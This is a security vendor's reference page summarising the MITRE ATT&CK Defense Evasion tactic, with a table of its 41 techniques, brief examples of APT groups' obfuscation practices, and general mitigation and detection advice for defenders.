Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware.
Tactic Overview
Tactic ID: TA0005 — Matrix: Enterprise — Techniques: 41
The Defense Evasion tactic represents a phase in the adversary lifecycle where the adversary is trying to avoid being detected. This tactic is part of the MITRE ATT&CK Enterprise matrix and encompasses 41 known techniques that adversaries employ during this phase of an attack.
Understanding this tactic is critical for defenders to build effective detection strategies and implement appropriate countermeasures. Organizations should map their security controls against each technique to identify coverage gaps and prioritize defensive investments.
Techniques (41)
The following techniques are categorized under the Defense Evasion tactic in the MITRE ATT&CK Enterprise matrix:
| Technique ID | Name | Description | MITRE Reference |
|---|---|---|---|
T1548 | Abuse Elevation Control Mechanism (5 sub-techniques) | Adversaries bypass UAC, sudo caching, or setuid/setgid mechanisms to escalate privileges on compromised systems. | T1548 |
T1134 | Access Token Manipulation (5 sub-techniques) | Adversaries manipulate access tokens to operate under different user or system security contexts for privilege escalation. | T1134 |
T1197 | BITS Jobs | Adversaries abuse Background Intelligent Transfer Service to download and execute malicious payloads while evading detection. | T1197 |
T1612 | Build Image on Host | Adversaries build container images on compromised hosts to bypass image scanning and deploy malicious containers. | T1612 |
T1622 | Debugger Evasion | Adversaries check for debugging environments and modify behavior to evade analysis by security researchers. | T1622 |
T1678 | Delay Execution | Adversaries delay execution of malicious payloads to evade time-based sandbox analysis and detection. | T1678 |
T1140 | Deobfuscate/Decode Files or Information | Adversaries deobfuscate or decode encrypted/encoded files and data to reveal payloads for execution on the target system. | T1140 |
T1006 | Direct Volume Access | Adversaries directly access logical drives and volumes to bypass file access controls and monitoring. | T1006 |
T1484 | Domain or Tenant Policy Modification (2 sub-techniques) | Adversaries modify domain-level or tenant-level policies (Group Policy, trust modifications) to escalate privileges across an environment. | T1484 |
T1672 | Email Spoofing | Adversaries spoof email sender addresses to bypass filtering and appear as trusted senders. | T1672 |
T1480 | Execution Guardrails (2 sub-techniques) | Adversaries use environmental checks (system language, domain membership) to ensure payloads only execute on intended targets. | T1480 |
T1211 | Exploitation for Defense Evasion | Adversaries exploit vulnerabilities to disable or bypass security tools and defensive mechanisms. | T1211 |
T1222 | File and Directory Permissions Modification (2 sub-techniques) | Adversaries modify file and directory permissions to enable further malicious activity or weaken security controls. | T1222 |
T1564 | Hide Artifacts (11 sub-techniques) | Adversaries hide files, directories, users, and other artifacts to evade detection using hidden attributes, NTFS ADS, or resource forks. | T1564 |
T1574 | Hijack Execution Flow (12 sub-techniques) | Adversaries hijack the way programs load code (DLL search order, PATH, dylib) to execute malicious payloads when legitimate programs run. | T1574 |
T1562 | Impair Defenses (10 sub-techniques) | Adversaries disable or modify security tools, logging, and defensive mechanisms to evade detection throughout their operation. | T1562 |
T1656 | Impersonation | Adversaries impersonate trusted entities to deceive victims and gain access to systems or information. | T1656 |
T1070 | Indicator Removal (9 sub-techniques) | Adversaries delete or modify artifacts (logs, files, timestamps) that could reveal their activities on compromised systems. | T1070 |
T1202 | Indirect Command Execution | Adversaries execute commands indirectly through trusted utilities to bypass application controls and monitoring. | T1202 |
T1036 | Masquerading (9 sub-techniques) | Adversaries disguise malicious artifacts as legitimate files or processes by manipulating names, locations, and metadata to evade defenses. | T1036 |
T1556 | Modify Authentication Process (9 sub-techniques) | Adversaries modify authentication mechanisms to bypass credentials and access accounts, including password filter DLLs and pluggable authentication modules. | T1556 |
T1578 | Modify Cloud Compute Infrastructure (4 sub-techniques) | Adversaries modify cloud compute infrastructure (create snapshots, instances) to evade defenses and establish persistence. | T1578 |
T1666 | Modify Cloud Resource Hierarchy | Adversaries modify cloud organizational structures to evade policies and gain elevated access across tenants. | T1666 |
T1112 | Modify Registry | Adversaries modify the Windows Registry to hide configuration information, establish persistence, or enable malicious functionality. | T1112 |
T1601 | Modify System Image (2 sub-techniques) | Adversaries modify the system image of network devices (routers, switches) to weaken integrity and persistence of defenses. | T1601 |
T1599 | Network Boundary Bridging (1 sub-techniques) | Adversaries bridge network boundaries to bypass segmentation controls and enable traffic flow between isolated network segments. | T1599 |
T1027 | Obfuscated Files or Information (17 sub-techniques) | Adversaries encrypt, encode, or obfuscate executables and files to evade detection. Includes software packing, steganography, HTML smuggling, and command obfuscation. Used by APT41, Sandworm, Kimsuky, and Mustang Panda. | T1027 |
T1647 | Plist File Modification | Adversaries modify property list (plist) files on macOS to hide configuration data and evade detection. | T1647 |
T1542 | Pre-OS Boot (5 sub-techniques) | Adversaries modify system boot processes (bootkit, UEFI, TFTP boot) to load malicious code before the operating system. | T1542 |
T1055 | Process Injection (12 sub-techniques) | Adversaries inject code into running processes to evade detection and escalate privileges. Includes DLL injection, process hollowing, APC injection, and thread hijacking. Used by APT32, APT37, APT38, Cobalt Strike, and many RATs. | T1055 |
T1620 | Reflective Code Loading | Adversaries load code into memory without writing to disk, using reflective DLL injection or in-memory .NET assembly loading. | T1620 |
T1207 | Rogue Domain Controller | Adversaries register rogue domain controllers using DCShadow to manipulate Active Directory data and evade detection. | T1207 |
T1014 | Rootkit | Adversaries install rootkits to hide the presence of malicious software and activity at the kernel or firmware level. | T1014 |
T1679 | Selective Exclusion | Adversaries selectively exclude malicious files or processes from security scanning to avoid detection. | T1679 |
T1553 | Subvert Trust Controls (6 sub-techniques) | Adversaries undermine security controls that rely on trust mechanisms, such as code signing validation and certificate checks. | T1553 |
T1218 | System Binary Proxy Execution (14 sub-techniques) | Adversaries abuse signed system binaries (rundll32, mshta, regsvr32, certutil) to proxy execution of malicious code and bypass defenses. | T1218 |
T1216 | System Script Proxy Execution (2 sub-techniques) | Adversaries abuse signed scripts (PubPrn.vbs, SyncAppvPublishingServer) to proxy execution of malicious code. | T1216 |
T1221 | Template Injection | Adversaries inject malicious code into document templates to execute payloads when users open templated documents. | T1221 |
T1205 | Traffic Signaling (2 sub-techniques) | Adversaries use specially crafted network packets to trigger hidden functionality on compromised systems (port knocking, wake-on-LAN abuse). | T1205 |
T1127 | Trusted Developer Utilities Proxy Execution (1 sub-techniques) | Adversaries abuse developer tools (MSBuild, dnx, rcsi) to execute malicious code while bypassing application controls. | T1127 |
T1610 | Deploy Container | Adversaries deploy malicious containers to execute code, bypass security controls, and establish persistence in container environments. | T1610 |
Key Technique Deep Dives
The following techniques are among the most commonly observed in real-world attacks within this tactic:
Real-World Usage
- APT41: VMProtected binaries; split malware across disk sections
- Sandworm: Heavily obfuscated code with Industroyer backdoor
- Kimsuky: XOR encryption + Base64 encoding; modified DLL first bytes
- Rocke: Modified UPX headers after packing to break unpackers
Key Mitigations
- M1049 - Antivirus/Antimalware: Automated detection; utilize AMSI on Windows 10+
- M1040 - Behavior Prevention on Endpoint: Enable ASR rules preventing obfuscated payload execution
Detection & Mitigation
Organizations should implement layered defenses addressing each technique within this tactic. Below are key mitigation strategies recommended by Mjolnir Security analysts.
Key Mitigations
- Behavioral-based detection
- AMSI integration
- Code signing enforcement
- Script block logging
- Memory protection (e.g., Credential Guard)
Detection Strategies
Effective detection of Defense Evasion techniques requires a combination of log analysis, behavioral monitoring, and threat intelligence correlation. Security teams should focus on establishing baselines for normal activity and alerting on deviations that may indicate adversary behavior aligned with this tactic.
- SIEM Integration: Correlate events across multiple data sources to detect technique patterns
- Behavioral Analytics: Deploy UEBA solutions to identify anomalous activity indicative of this tactic
- Threat Hunting: Proactively search for indicators of techniques within this tactic using hypothesis-driven investigations
- Purple Teaming: Regularly test detection coverage by simulating techniques from this tactic
Associated Threat Actors
The following threat actors are known to heavily leverage techniques from the Defense Evasion tactic:
For comprehensive threat actor profiles, visit the APT Groups Hub.
Resources & References
Defend Against Defense Evasion Techniques
Mjolnir Security provides expert threat intelligence, purple team exercises, and detection engineering services to help organizations defend against adversary tactics mapped to the MITRE ATT&CK framework.
Stay updated on MITRE ATT&CK developments and threat intelligence insights.
View All Reports →Written by Mjolnir Security Research — Published March 7, 2026